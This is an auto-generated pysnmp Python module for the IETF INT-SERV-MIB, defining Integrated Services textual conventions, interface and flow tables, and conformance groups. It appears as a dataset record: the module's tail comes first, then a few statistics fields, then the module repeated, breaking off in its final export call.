if getattr(mibBuilder, 'version', (0, 0, 0)) > (4, 4, 0):
intSrvCompliance = intSrvCompliance.setStatus('current')
if mibBuilder.loadTexts: intSrvCompliance.setDescription('The compliance statement ')
intSrvIfAttribGroup = ObjectGroup((1, 3, 6, 1, 2, 1, 52, 4, 1, 1)).setObjects(("INT-SERV-MIB", "intSrvIfAttribAllocatedBits"), ("INT-SERV-MIB", "intSrvIfAttribMaxAllocatedBits"), ("INT-SERV-MIB", "intSrvIfAttribAllocatedBuffer"), ("INT-SERV-MIB", "intSrvIfAttribFlows"), ("INT-SERV-MIB", "intSrvIfAttribPropagationDelay"), ("INT-SERV-MIB", "intSrvIfAttribStatus"))
if getattr(mibBuilder, 'version', (0, 0, 0)) > (4, 4, 0):
intSrvIfAttribGroup = intSrvIfAttribGroup.setStatus('current')
if mibBuilder.loadTexts: intSrvIfAttribGroup.setDescription('These objects are required for Systems sup- porting the Integrated Services Architecture.')
intSrvFlowsGroup = ObjectGroup((1, 3, 6, 1, 2, 1, 52, 4, 1, 2)).setObjects(("INT-SERV-MIB", "intSrvFlowType"), ("INT-SERV-MIB", "intSrvFlowOwner"), ("INT-SERV-MIB", "intSrvFlowDestAddr"), ("INT-SERV-MIB", "intSrvFlowSenderAddr"), ("INT-SERV-MIB", "intSrvFlowDestAddrLength"), ("INT-SERV-MIB", "intSrvFlowSenderAddrLength"), ("INT-SERV-MIB", "intSrvFlowProtocol"), ("INT-SERV-MIB", "intSrvFlowDestPort"), ("INT-SERV-MIB", "intSrvFlowPort"), ("INT-SERV-MIB", "intSrvFlowFlowId"), ("INT-SERV-MIB", "intSrvFlowInterface"), ("INT-SERV-MIB", "intSrvFlowBestEffort"), ("INT-SERV-MIB", "intSrvFlowRate"), ("INT-SERV-MIB", "intSrvFlowBurst"), ("INT-SERV-MIB", "intSrvFlowWeight"), ("INT-SERV-MIB", "intSrvFlowQueue"), ("INT-SERV-MIB", "intSrvFlowMinTU"), ("INT-SERV-MIB", "intSrvFlowMaxTU"), ("INT-SERV-MIB", "intSrvFlowDiscard"), ("INT-SERV-MIB", "intSrvFlowPoliced"), ("INT-SERV-MIB", "intSrvFlowService"), ("INT-SERV-MIB", "intSrvFlowIfAddr"), ("INT-SERV-MIB", "intSrvFlowOrder"), ("INT-SERV-MIB", "intSrvFlowStatus"))
if getattr(mibBuilder, 'version', (0, 0, 0)) > (4, 4, 0):
intSrvFlowsGroup = intSrvFlowsGroup.setStatus('current')
if mibBuilder.loadTexts: intSrvFlowsGroup.setDescription('These objects are required for Systems sup- porting the Integrated Services Architecture.')
intSrvGenObjectsGroup = ObjectGroup((1, 3, 6, 1, 2, 1, 52, 4, 1, 3)).setObjects(("INT-SERV-MIB", "intSrvFlowNewIndex"))
if getattr(mibBuilder, 'version', (0, 0, 0)) > (4, 4, 0):
intSrvGenObjectsGroup = intSrvGenObjectsGroup.setStatus('current')
if mibBuilder.loadTexts: intSrvGenObjectsGroup.setDescription('These objects are required for Systems sup- porting the Integrated Services Architecture.')
mibBuilder.exportSymbols("INT-SERV-MIB", BitRate=BitRate, intSrvIfAttribAllocatedBits=intSrvIfAttribAllocatedBits, intSrvFlowMaxTU=intSrvFlowMaxTU, intSrvFlowOrder=intSrvFlowOrder, PYSNMP_MODULE_ID=intSrv, Protocol=Protocol, intSrvIfAttribAllocatedBuffer=intSrvIfAttribAllocatedBuffer, intSrvFlowDestAddr=intSrvFlowDestAddr, intSrvFlowBurst=intSrvFlowBurst, intSrvIfAttribFlows=intSrvIfAttribFlows, intSrvFlowTable=intSrvFlowTable, intSrvFlowEntry=intSrvFlowEntry, intSrvFlowSenderAddrLength=intSrvFlowSenderAddrLength, intSrvIfAttribGroup=intSrvIfAttribGroup, intSrvFlowInterface=intSrvFlowInterface, intSrvFlowDestAddrLength=intSrvFlowDestAddrLength, intSrvFlowDestPort=intSrvFlowDestPort, BurstSize=BurstSize, intSrvFlowStatus=intSrvFlowStatus, intSrvIfAttribMaxAllocatedBits=intSrvIfAttribMaxAllocatedBits, intSrvFlowNewIndex=intSrvFlowNewIndex, intSrvGroups=intSrvGroups, MessageSize=MessageSize, intSrvFlowRate=intSrvFlowRate, intSrvFlowPort=intSrvFlowPort, intSrvFlowIfAddr=intSrvFlowIfAddr, SessionType=SessionType, intSrvIfAttribTable=intSrvIfAttribTable, intSrvIfAttribPropagationDelay=intSrvIfAttribPropagationDelay, intSrvFlowService=intSrvFlowService, intSrvFlowsGroup=intSrvFlowsGroup, intSrvFlowWeight=intSrvFlowWeight, intSrvFlowMinTU=intSrvFlowMinTU, intSrvFlowProtocol=intSrvFlowProtocol, intSrvFlowOwner=intSrvFlowOwner, intSrvIfAttribEntry=intSrvIfAttribEntry, intSrvFlowSenderAddr=intSrvFlowSenderAddr, QosService=QosService, SessionNumber=SessionNumber, intSrvObjects=intSrvObjects, intSrvGenObjects=intSrvGenObjects, intSrvFlowFlowId=intSrvFlowFlowId, intSrvCompliances=intSrvCompliances, intSrv=intSrv, intSrvFlowNumber=intSrvFlowNumber, intSrvNotifications=intSrvNotifications, intSrvFlowQueue=intSrvFlowQueue, intSrvFlowBestEffort=intSrvFlowBestEffort, intSrvFlowType=intSrvFlowType, intSrvCompliance=intSrvCompliance, Port=Port, intSrvIfAttribStatus=intSrvIfAttribStatus, intSrvFlowPoliced=intSrvFlowPoliced, intSrvFlowDiscard=intSrvFlowDiscard, intSrvGenObjectsGroup=intSrvGenObjectsGroup, intSrvConformance=intSrvConformance)
| 129.878788
| 2,054
| 0.780876
|
ObjectIdentifier, OctetString, Integer = mibBuilder.importSymbols("ASN1", "ObjectIdentifier", "OctetString", "Integer")
NamedValues, = mibBuilder.importSymbols("ASN1-ENUMERATION", "NamedValues")
ValueRangeConstraint, ConstraintsUnion, SingleValueConstraint, ConstraintsIntersection, ValueSizeConstraint = mibBuilder.importSymbols("ASN1-REFINEMENT", "ValueRangeConstraint", "ConstraintsUnion", "SingleValueConstraint", "ConstraintsIntersection", "ValueSizeConstraint")
InterfaceIndex, ifIndex = mibBuilder.importSymbols("IF-MIB", "InterfaceIndex", "ifIndex")
ModuleCompliance, ObjectGroup, NotificationGroup = mibBuilder.importSymbols("SNMPv2-CONF", "ModuleCompliance", "ObjectGroup", "NotificationGroup")
MibScalar, MibTable, MibTableRow, MibTableColumn, Counter64, Counter32, IpAddress, ModuleIdentity, Unsigned32, MibIdentifier, NotificationType, Integer32, TimeTicks, Bits, mib_2, iso, Gauge32, ObjectIdentity = mibBuilder.importSymbols("SNMPv2-SMI", "MibScalar", "MibTable", "MibTableRow", "MibTableColumn", "Counter64", "Counter32", "IpAddress", "ModuleIdentity", "Unsigned32", "MibIdentifier", "NotificationType", "Integer32", "TimeTicks", "Bits", "mib-2", "iso", "Gauge32", "ObjectIdentity")
DisplayString, TruthValue, RowStatus, TestAndIncr, TextualConvention = mibBuilder.importSymbols("SNMPv2-TC", "DisplayString", "TruthValue", "RowStatus", "TestAndIncr", "TextualConvention")
intSrv = ModuleIdentity((1, 3, 6, 1, 2, 1, 52))
if mibBuilder.loadTexts: intSrv.setLastUpdated('9710030642Z')
if mibBuilder.loadTexts: intSrv.setOrganization('IETF Integrated Services Working Group')
if mibBuilder.loadTexts: intSrv.setContactInfo(' Fred Baker Postal: Cisco Systems 519 Lado Drive Santa Barbara, California 93111 Tel: +1 805 681 0115 E-Mail: fred@cisco.com John Krawczyk Postal: ArrowPoint Communications 235 Littleton Road Westford, Massachusetts 01886 Tel: +1 508 692 5875 E-Mail: jjk@tiac.net')
if mibBuilder.loadTexts: intSrv.setDescription('The MIB module to describe the Integrated Services Protocol')
intSrvObjects = MibIdentifier((1, 3, 6, 1, 2, 1, 52, 1))
intSrvGenObjects = MibIdentifier((1, 3, 6, 1, 2, 1, 52, 2))
intSrvNotifications = MibIdentifier((1, 3, 6, 1, 2, 1, 52, 3))
intSrvConformance = MibIdentifier((1, 3, 6, 1, 2, 1, 52, 4))
class SessionNumber(TextualConvention, Integer32):
description = 'The Session Number convention is used for numbers identifying sessions or saved PATH or RESV information. It is a number in the range returned by a TestAndIncr variable, having no protocol meaning whatsoever but serving instead as simple identifier. The alternative was a very complex instance or instance object that became unwieldy.'
status = 'current'
subtypeSpec = Integer32.subtypeSpec + ValueRangeConstraint(0, 2147483647)
class Protocol(TextualConvention, Integer32):
description = 'The value of the IP Protocol field of an IP Datagram Header. This identifies the protocol layer above IP. For example, the value 6 is used for TCP and the value 17 is used for UDP. The values of this field are defined in the As- signed Numbers RFC.'
status = 'current'
displayHint = 'd'
subtypeSpec = Integer32.subtypeSpec + ValueRangeConstraint(1, 255)
class SessionType(TextualConvention, Integer32):
description = "The value of the C-Type field of a Session ob- ject, as defined in the RSVP specification. This value determines the lengths of octet strings and use of certain objects such as the 'port' variables. If the C-Type calls for an IP6 address, one would expect all source, des- tination, and next/previous hop addresses to be 16 bytes long, and for the ports to be UDP/TCP port numbers, for example."
status = 'current'
subtypeSpec = Integer32.subtypeSpec + ValueRangeConstraint(1, 255)
class Port(TextualConvention, OctetString):
description = 'The value of the UDP or TCP Source or Destina- tion Port field, a virtual destination port or generalized port identifier used with the IPSEC Authentication Header or Encapsulating Security Payload, or other session discriminator. If it is not used, the value should be of length 0. This pair, when coupled with the IP Addresses of the source and destination system and the IP protocol field, uniquely identifies a data stream.'
status = 'current'
displayHint = 'd'
subtypeSpec = OctetString.subtypeSpec + ValueSizeConstraint(2, 4)
class MessageSize(TextualConvention, Integer32):
description = 'The size of a message in bytes. This is used to specify the minimum and maximum size of a message along an integrated services route.'
status = 'current'
displayHint = 'd'
subtypeSpec = Integer32.subtypeSpec + ValueRangeConstraint(0, 2147483647)
class BitRate(TextualConvention, Integer32):
description = 'The rate, in bits/second, that data may move in the context. Applicable contexts minimally include the speed of an interface or virtual circuit, the data rate of a (potentially aggre- gated) data flow, or the data rate to be allo- cated for use by a flow.'
status = 'current'
displayHint = 'd'
subtypeSpec = Integer32.subtypeSpec + ValueRangeConstraint(0, 2147483647)
class BurstSize(TextualConvention, Integer32):
description = 'The number of octets of IP Data, including IP Headers, that a stream may send without concern for policing.'
status = 'current'
displayHint = 'd'
subtypeSpec = Integer32.subtypeSpec + ValueRangeConstraint(0, 2147483647)
class QosService(TextualConvention, Integer32):
description = 'The class of service in use by a flow.'
status = 'current'
subtypeSpec = Integer32.subtypeSpec + ConstraintsUnion(SingleValueConstraint(1, 2, 5))
namedValues = NamedValues(("bestEffort", 1), ("guaranteedDelay", 2), ("controlledLoad", 5))
intSrvIfAttribTable = MibTable((1, 3, 6, 1, 2, 1, 52, 1, 1), )
if mibBuilder.loadTexts: intSrvIfAttribTable.setStatus('current')
if mibBuilder.loadTexts: intSrvIfAttribTable.setDescription("The reservable attributes of the system's in- terfaces.")
intSrvIfAttribEntry = MibTableRow((1, 3, 6, 1, 2, 1, 52, 1, 1, 1), ).setIndexNames((0, "IF-MIB", "ifIndex"))
if mibBuilder.loadTexts: intSrvIfAttribEntry.setStatus('current')
if mibBuilder.loadTexts: intSrvIfAttribEntry.setDescription('The reservable attributes of a given inter- face.')
intSrvIfAttribAllocatedBits = MibTableColumn((1, 3, 6, 1, 2, 1, 52, 1, 1, 1, 1), BitRate()).setUnits('Bits per second').setMaxAccess("readonly")
if mibBuilder.loadTexts: intSrvIfAttribAllocatedBits.setStatus('current')
if mibBuilder.loadTexts: intSrvIfAttribAllocatedBits.setDescription('The number of bits/second currently allocated to reserved sessions on the interface.')
intSrvIfAttribMaxAllocatedBits = MibTableColumn((1, 3, 6, 1, 2, 1, 52, 1, 1, 1, 2), BitRate()).setUnits('Bits per second').setMaxAccess("readcreate")
if mibBuilder.loadTexts: intSrvIfAttribMaxAllocatedBits.setStatus('current')
if mibBuilder.loadTexts: intSrvIfAttribMaxAllocatedBits.setDescription('The maximum number of bits/second that may be allocated to reserved sessions on the inter- face.')
intSrvIfAttribAllocatedBuffer = MibTableColumn((1, 3, 6, 1, 2, 1, 52, 1, 1, 1, 3), BurstSize()).setUnits('Bytes').setMaxAccess("readonly")
if mibBuilder.loadTexts: intSrvIfAttribAllocatedBuffer.setStatus('current')
if mibBuilder.loadTexts: intSrvIfAttribAllocatedBuffer.setDescription('The amount of buffer space required to hold the simultaneous burst of all reserved flows on the interface.')
intSrvIfAttribFlows = MibTableColumn((1, 3, 6, 1, 2, 1, 52, 1, 1, 1, 4), Gauge32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: intSrvIfAttribFlows.setStatus('current')
if mibBuilder.loadTexts: intSrvIfAttribFlows.setDescription('The number of reserved flows currently active on this interface. A flow can be created ei- ther from a reservation protocol (such as RSVP or ST-II) or via configuration information.')
intSrvIfAttribPropagationDelay = MibTableColumn((1, 3, 6, 1, 2, 1, 52, 1, 1, 1, 5), Integer32()).setUnits('microseconds').setMaxAccess("readcreate")
if mibBuilder.loadTexts: intSrvIfAttribPropagationDelay.setStatus('current')
if mibBuilder.loadTexts: intSrvIfAttribPropagationDelay.setDescription('The amount of propagation delay that this in- terface introduces in addition to that intro- diced by bit propagation delays.')
intSrvIfAttribStatus = MibTableColumn((1, 3, 6, 1, 2, 1, 52, 1, 1, 1, 6), RowStatus()).setMaxAccess("readcreate")
if mibBuilder.loadTexts: intSrvIfAttribStatus.setStatus('current')
if mibBuilder.loadTexts: intSrvIfAttribStatus.setDescription("'active' on interfaces that are configured for RSVP.")
intSrvFlowTable = MibTable((1, 3, 6, 1, 2, 1, 52, 1, 2), )
if mibBuilder.loadTexts: intSrvFlowTable.setStatus('current')
if mibBuilder.loadTexts: intSrvFlowTable.setDescription("Information describing the reserved flows us- ing the system's interfaces.")
intSrvFlowEntry = MibTableRow((1, 3, 6, 1, 2, 1, 52, 1, 2, 1), ).setIndexNames((0, "INT-SERV-MIB", "intSrvFlowNumber"))
if mibBuilder.loadTexts: intSrvFlowEntry.setStatus('current')
if mibBuilder.loadTexts: intSrvFlowEntry.setDescription('Information describing the use of a given in- terface by a given flow. The counter intSrvFlowPoliced starts counting at the in- stallation of the flow.')
intSrvFlowNumber = MibTableColumn((1, 3, 6, 1, 2, 1, 52, 1, 2, 1, 1), SessionNumber())
if mibBuilder.loadTexts: intSrvFlowNumber.setStatus('current')
if mibBuilder.loadTexts: intSrvFlowNumber.setDescription('The number of this flow. This is for SNMP In- dexing purposes only and has no relation to any protocol value.')
intSrvFlowType = MibTableColumn((1, 3, 6, 1, 2, 1, 52, 1, 2, 1, 2), SessionType()).setMaxAccess("readcreate")
if mibBuilder.loadTexts: intSrvFlowType.setStatus('current')
if mibBuilder.loadTexts: intSrvFlowType.setDescription('The type of session (IP4, IP6, IP6 with flow information, etc).')
intSrvFlowOwner = MibTableColumn((1, 3, 6, 1, 2, 1, 52, 1, 2, 1, 3), Integer32().subtype(subtypeSpec=ConstraintsUnion(SingleValueConstraint(1, 2, 3))).clone(namedValues=NamedValues(("other", 1), ("rsvp", 2), ("management", 3)))).setMaxAccess("readcreate")
if mibBuilder.loadTexts: intSrvFlowOwner.setStatus('current')
if mibBuilder.loadTexts: intSrvFlowOwner.setDescription('The process that installed this flow in the queue policy database.')
intSrvFlowDestAddr = MibTableColumn((1, 3, 6, 1, 2, 1, 52, 1, 2, 1, 4), OctetString().subtype(subtypeSpec=ValueSizeConstraint(4, 16))).setMaxAccess("readcreate")
if mibBuilder.loadTexts: intSrvFlowDestAddr.setStatus('current')
if mibBuilder.loadTexts: intSrvFlowDestAddr.setDescription("The destination address used by all senders in this session. This object may not be changed when the value of the RowStatus object is 'ac- tive'.")
intSrvFlowSenderAddr = MibTableColumn((1, 3, 6, 1, 2, 1, 52, 1, 2, 1, 5), OctetString().subtype(subtypeSpec=ValueSizeConstraint(4, 16))).setMaxAccess("readcreate")
if mibBuilder.loadTexts: intSrvFlowSenderAddr.setStatus('current')
if mibBuilder.loadTexts: intSrvFlowSenderAddr.setDescription("The source address of the sender selected by this reservation. The value of all zeroes in- dicates 'all senders'. This object may not be changed when the value of the RowStatus object is 'active'.")
intSrvFlowDestAddrLength = MibTableColumn((1, 3, 6, 1, 2, 1, 52, 1, 2, 1, 6), Integer32().subtype(subtypeSpec=ValueRangeConstraint(0, 128))).setMaxAccess("readcreate")
if mibBuilder.loadTexts: intSrvFlowDestAddrLength.setStatus('current')
if mibBuilder.loadTexts: intSrvFlowDestAddrLength.setDescription("The length of the destination address in bits. This is the CIDR Prefix Length, which for IP4 hosts and multicast addresses is 32 bits. This object may not be changed when the value of the RowStatus object is 'active'.")
intSrvFlowSenderAddrLength = MibTableColumn((1, 3, 6, 1, 2, 1, 52, 1, 2, 1, 7), Integer32().subtype(subtypeSpec=ValueRangeConstraint(0, 128))).setMaxAccess("readcreate")
if mibBuilder.loadTexts: intSrvFlowSenderAddrLength.setStatus('current')
if mibBuilder.loadTexts: intSrvFlowSenderAddrLength.setDescription("The length of the sender's address in bits. This is the CIDR Prefix Length, which for IP4 hosts and multicast addresses is 32 bits. This object may not be changed when the value of the RowStatus object is 'active'.")
intSrvFlowProtocol = MibTableColumn((1, 3, 6, 1, 2, 1, 52, 1, 2, 1, 8), Protocol()).setMaxAccess("readcreate")
if mibBuilder.loadTexts: intSrvFlowProtocol.setStatus('current')
if mibBuilder.loadTexts: intSrvFlowProtocol.setDescription("The IP Protocol used by a session. This ob- ject may not be changed when the value of the RowStatus object is 'active'.")
intSrvFlowDestPort = MibTableColumn((1, 3, 6, 1, 2, 1, 52, 1, 2, 1, 9), Port()).setMaxAccess("readcreate")
if mibBuilder.loadTexts: intSrvFlowDestPort.setStatus('current')
if mibBuilder.loadTexts: intSrvFlowDestPort.setDescription("The UDP or TCP port number used as a destina- tion port for all senders in this session. If the IP protocol in use, specified by intSrvResvFwdProtocol, is 50 (ESP) or 51 (AH), this represents a virtual destination port number. A value of zero indicates that the IP protocol in use does not have ports. This ob- ject may not be changed when the value of the RowStatus object is 'active'.")
intSrvFlowPort = MibTableColumn((1, 3, 6, 1, 2, 1, 52, 1, 2, 1, 10), Port()).setMaxAccess("readcreate")
if mibBuilder.loadTexts: intSrvFlowPort.setStatus('current')
if mibBuilder.loadTexts: intSrvFlowPort.setDescription("The UDP or TCP port number used as a source port for this sender in this session. If the IP protocol in use, specified by intSrvResvFwdProtocol is 50 (ESP) or 51 (AH), this represents a generalized port identifier (GPI). A value of zero indicates that the IP protocol in use does not have ports. This ob- ject may not be changed when the value of the RowStatus object is 'active'.")
intSrvFlowFlowId = MibTableColumn((1, 3, 6, 1, 2, 1, 52, 1, 2, 1, 11), Integer32().subtype(subtypeSpec=ValueRangeConstraint(0, 16777215))).setMaxAccess("readonly")
if mibBuilder.loadTexts: intSrvFlowFlowId.setStatus('current')
if mibBuilder.loadTexts: intSrvFlowFlowId.setDescription('The flow ID that this sender is using, if this is an IPv6 session.')
intSrvFlowInterface = MibTableColumn((1, 3, 6, 1, 2, 1, 52, 1, 2, 1, 12), InterfaceIndex()).setMaxAccess("readcreate")
if mibBuilder.loadTexts: intSrvFlowInterface.setStatus('current')
if mibBuilder.loadTexts: intSrvFlowInterface.setDescription('The ifIndex value of the interface on which this reservation exists.')
intSrvFlowIfAddr = MibTableColumn((1, 3, 6, 1, 2, 1, 52, 1, 2, 1, 13), OctetString().subtype(subtypeSpec=ValueSizeConstraint(4, 16))).setMaxAccess("readcreate")
if mibBuilder.loadTexts: intSrvFlowIfAddr.setStatus('current')
if mibBuilder.loadTexts: intSrvFlowIfAddr.setDescription('The IP Address on the ifEntry on which this reservation exists. This is present primarily to support those interfaces which layer multi- ple IP Addresses on the interface.')
intSrvFlowRate = MibTableColumn((1, 3, 6, 1, 2, 1, 52, 1, 2, 1, 14), BitRate()).setUnits('bits per second').setMaxAccess("readcreate")
if mibBuilder.loadTexts: intSrvFlowRate.setStatus('current')
if mibBuilder.loadTexts: intSrvFlowRate.setDescription("The Reserved Rate of the sender's data stream. If this is a Controlled Load service flow, this rate is derived from the Tspec rate parameter (r). If this is a Guaranteed service flow, this rate is derived from the Rspec clearing rate parameter (R).")
intSrvFlowBurst = MibTableColumn((1, 3, 6, 1, 2, 1, 52, 1, 2, 1, 15), BurstSize()).setUnits('bytes').setMaxAccess("readcreate")
if mibBuilder.loadTexts: intSrvFlowBurst.setStatus('current')
if mibBuilder.loadTexts: intSrvFlowBurst.setDescription("The size of the largest burst expected from the sender at a time. If this is less than the sender's advertised burst size, the receiver is asking the network to provide flow pacing beyond what would be provided under normal circumstances. Such pac- ing is at the network's option.")
intSrvFlowWeight = MibTableColumn((1, 3, 6, 1, 2, 1, 52, 1, 2, 1, 16), Integer32()).setMaxAccess("readcreate")
if mibBuilder.loadTexts: intSrvFlowWeight.setStatus('current')
if mibBuilder.loadTexts: intSrvFlowWeight.setDescription('The weight used to prioritize the traffic. Note that the interpretation of this object is implementation-specific, as implementations vary in their use of weighting procedures.')
intSrvFlowQueue = MibTableColumn((1, 3, 6, 1, 2, 1, 52, 1, 2, 1, 17), Integer32()).setMaxAccess("readcreate")
if mibBuilder.loadTexts: intSrvFlowQueue.setStatus('current')
if mibBuilder.loadTexts: intSrvFlowQueue.setDescription('The number of the queue used by this traffic. Note that the interpretation of this object is implementation-specific, as implementations vary in their use of queue identifiers.')
intSrvFlowMinTU = MibTableColumn((1, 3, 6, 1, 2, 1, 52, 1, 2, 1, 18), MessageSize()).setMaxAccess("readcreate")
if mibBuilder.loadTexts: intSrvFlowMinTU.setStatus('current')
if mibBuilder.loadTexts: intSrvFlowMinTU.setDescription('The minimum message size for this flow. The policing algorithm will treat smaller messages as though they are this size.')
intSrvFlowMaxTU = MibTableColumn((1, 3, 6, 1, 2, 1, 52, 1, 2, 1, 19), MessageSize()).setMaxAccess("readcreate")
if mibBuilder.loadTexts: intSrvFlowMaxTU.setStatus('current')
if mibBuilder.loadTexts: intSrvFlowMaxTU.setDescription('The maximum datagram size for this flow that will conform to the traffic specification. This value cannot exceed the MTU of the interface.')
intSrvFlowBestEffort = MibTableColumn((1, 3, 6, 1, 2, 1, 52, 1, 2, 1, 20), Counter32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: intSrvFlowBestEffort.setStatus('current')
if mibBuilder.loadTexts: intSrvFlowBestEffort.setDescription('The number of packets that were remanded to best effort service.')
intSrvFlowPoliced = MibTableColumn((1, 3, 6, 1, 2, 1, 52, 1, 2, 1, 21), Counter32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: intSrvFlowPoliced.setStatus('current')
if mibBuilder.loadTexts: intSrvFlowPoliced.setDescription("The number of packets policed since the incep- tion of the flow's service.")
intSrvFlowDiscard = MibTableColumn((1, 3, 6, 1, 2, 1, 52, 1, 2, 1, 22), TruthValue().clone('false')).setMaxAccess("readcreate")
if mibBuilder.loadTexts: intSrvFlowDiscard.setStatus('current')
if mibBuilder.loadTexts: intSrvFlowDiscard.setDescription("If 'true', the flow is to incur loss when traffic is policed. If 'false', policed traff- ic is treated as best effort traffic.")
intSrvFlowService = MibTableColumn((1, 3, 6, 1, 2, 1, 52, 1, 2, 1, 23), QosService()).setMaxAccess("readonly")
if mibBuilder.loadTexts: intSrvFlowService.setStatus('current')
if mibBuilder.loadTexts: intSrvFlowService.setDescription('The QoS service being applied to this flow.')
intSrvFlowOrder = MibTableColumn((1, 3, 6, 1, 2, 1, 52, 1, 2, 1, 24), Integer32().subtype(subtypeSpec=ValueRangeConstraint(0, 65535))).setMaxAccess("readcreate")
if mibBuilder.loadTexts: intSrvFlowOrder.setStatus('current')
if mibBuilder.loadTexts: intSrvFlowOrder.setDescription('In the event of ambiguity, the order in which the classifier should make its comparisons. The row with intSrvFlowOrder=0 is tried first, and comparisons proceed in the order of in- creasing value. Non-serial implementations of the classifier should emulate this behavior.')
intSrvFlowStatus = MibTableColumn((1, 3, 6, 1, 2, 1, 52, 1, 2, 1, 25), RowStatus()).setMaxAccess("readcreate")
if mibBuilder.loadTexts: intSrvFlowStatus.setStatus('current')
if mibBuilder.loadTexts: intSrvFlowStatus.setDescription("'active' for all active flows. This object may be used to install static classifier infor- mation, delete classifier information, or au- thorize such.")
intSrvFlowNewIndex = MibScalar((1, 3, 6, 1, 2, 1, 52, 2, 1), TestAndIncr()).setMaxAccess("readwrite")
if mibBuilder.loadTexts: intSrvFlowNewIndex.setStatus('current')
if mibBuilder.loadTexts: intSrvFlowNewIndex.setDescription("This object is used to assign values to intSrvFlowNumber as described in 'Textual Con- ventions for SNMPv2'. The network manager reads the object, and then writes the value back in the SET that creates a new instance of intSrvFlowEntry. If the SET fails with the code 'inconsistentValue', then the process must be repeated; If the SET succeeds, then the ob- ject is incremented, and the new instance is created according to the manager's directions.")
intSrvGroups = MibIdentifier((1, 3, 6, 1, 2, 1, 52, 4, 1))
intSrvCompliances = MibIdentifier((1, 3, 6, 1, 2, 1, 52, 4, 2))
intSrvCompliance = ModuleCompliance((1, 3, 6, 1, 2, 1, 52, 4, 2, 1)).setObjects(("INT-SERV-MIB", "intSrvIfAttribGroup"), ("INT-SERV-MIB", "intSrvFlowsGroup"), ("INT-SERV-MIB", "intSrvGenObjectsGroup"))
if getattr(mibBuilder, 'version', (0, 0, 0)) > (4, 4, 0):
intSrvCompliance = intSrvCompliance.setStatus('current')
if mibBuilder.loadTexts: intSrvCompliance.setDescription('The compliance statement ')
intSrvIfAttribGroup = ObjectGroup((1, 3, 6, 1, 2, 1, 52, 4, 1, 1)).setObjects(("INT-SERV-MIB", "intSrvIfAttribAllocatedBits"), ("INT-SERV-MIB", "intSrvIfAttribMaxAllocatedBits"), ("INT-SERV-MIB", "intSrvIfAttribAllocatedBuffer"), ("INT-SERV-MIB", "intSrvIfAttribFlows"), ("INT-SERV-MIB", "intSrvIfAttribPropagationDelay"), ("INT-SERV-MIB", "intSrvIfAttribStatus"))
if getattr(mibBuilder, 'version', (0, 0, 0)) > (4, 4, 0):
intSrvIfAttribGroup = intSrvIfAttribGroup.setStatus('current')
if mibBuilder.loadTexts: intSrvIfAttribGroup.setDescription('These objects are required for Systems sup- porting the Integrated Services Architecture.')
intSrvFlowsGroup = ObjectGroup((1, 3, 6, 1, 2, 1, 52, 4, 1, 2)).setObjects(("INT-SERV-MIB", "intSrvFlowType"), ("INT-SERV-MIB", "intSrvFlowOwner"), ("INT-SERV-MIB", "intSrvFlowDestAddr"), ("INT-SERV-MIB", "intSrvFlowSenderAddr"), ("INT-SERV-MIB", "intSrvFlowDestAddrLength"), ("INT-SERV-MIB", "intSrvFlowSenderAddrLength"), ("INT-SERV-MIB", "intSrvFlowProtocol"), ("INT-SERV-MIB", "intSrvFlowDestPort"), ("INT-SERV-MIB", "intSrvFlowPort"), ("INT-SERV-MIB", "intSrvFlowFlowId"), ("INT-SERV-MIB", "intSrvFlowInterface"), ("INT-SERV-MIB", "intSrvFlowBestEffort"), ("INT-SERV-MIB", "intSrvFlowRate"), ("INT-SERV-MIB", "intSrvFlowBurst"), ("INT-SERV-MIB", "intSrvFlowWeight"), ("INT-SERV-MIB", "intSrvFlowQueue"), ("INT-SERV-MIB", "intSrvFlowMinTU"), ("INT-SERV-MIB", "intSrvFlowMaxTU"), ("INT-SERV-MIB", "intSrvFlowDiscard"), ("INT-SERV-MIB", "intSrvFlowPoliced"), ("INT-SERV-MIB", "intSrvFlowService"), ("INT-SERV-MIB", "intSrvFlowIfAddr"), ("INT-SERV-MIB", "intSrvFlowOrder"), ("INT-SERV-MIB", "intSrvFlowStatus"))
if getattr(mibBuilder, 'version', (0, 0, 0)) > (4, 4, 0):
intSrvFlowsGroup = intSrvFlowsGroup.setStatus('current')
if mibBuilder.loadTexts: intSrvFlowsGroup.setDescription('These objects are required for Systems sup- porting the Integrated Services Architecture.')
intSrvGenObjectsGroup = ObjectGroup((1, 3, 6, 1, 2, 1, 52, 4, 1, 3)).setObjects(("INT-SERV-MIB", "intSrvFlowNewIndex"))
if getattr(mibBuilder, 'version', (0, 0, 0)) > (4, 4, 0):
intSrvGenObjectsGroup = intSrvGenObjectsGroup.setStatus('current')
if mibBuilder.loadTexts: intSrvGenObjectsGroup.setDescription('These objects are required for Systems sup- porting the Integrated Services Architecture.')
mibBuilder.exportSymbols("INT-SERV-MIB", BitRate=BitRate, intSrvIfAttribAllocatedBits=intSrvIfAttribAllocatedBits, intSrvFlowMaxTU=intSrvFlowMaxTU, intSrvFlowOrder=intSrvFlowOrder, PYSNMP_MODULE_ID=intSrv, Protocol=Protocol, intSrvIfAttribAllocatedBuffer=intSrvIfAttribAllocatedBuffer, intSrvFlowDestAddr=intSrvFlowDestAddr, intSrvFlowBurst=intSrvFlowBurst, intSrvIfAttribFlows=intSrvIfAttribFlows, intSrvFlowTable=intSrvFlowTable, intSrvFlowEntry=intSrvFlowEntry, intSrvFlowSenderAddrLength=intSrvFlowSenderAddrLength, intSrvIfAttribGroup=intSrvIfAttribGroup, intSrvFlowInterface=intSrvFlowInterface, intSrvFlowDestAddrLength=intSrvFlowDestAddrLength, intSrvFlowDestPort=intSrvFlowDestPort, BurstSize=BurstSize, intSrvFlowStatus=intSrvFlowStatus, intSrvIfAttribMaxAllocatedBits=intSrvIfAttribMaxAllocatedBits, intSrvFlowNewIndex=intSrvFlowNewIndex, intSrvGroups=intSrvGroups, MessageSize=MessageSize, intSrvFlowRate=intSrvFlowRate, intSrvFlowPort=intSrvFlowPort, intSrvFlowIfAddr=intSrvFlowIfAddr, SessionType=SessionType, intSrvIfAttribTable=intSrvIfAttribTable, intSrvIfAttribPropagationDelay=intSrvIfAttribPropagationDelay, intSrvFlowService=intSrvFlowService, intSrvFlowsGroup=intSrvFlowsGroup, intSrvFlowWeight=intSrvFlowWeight, intSrvFlowMinTU=intSrvFlowMinTU, intSrvFlowProtocol=intSrvFlowProtocol, intSrvFlowOwner=intSrvFlowOwner, intSrvIfAttribEntry=intSrvIfAttribEntry, 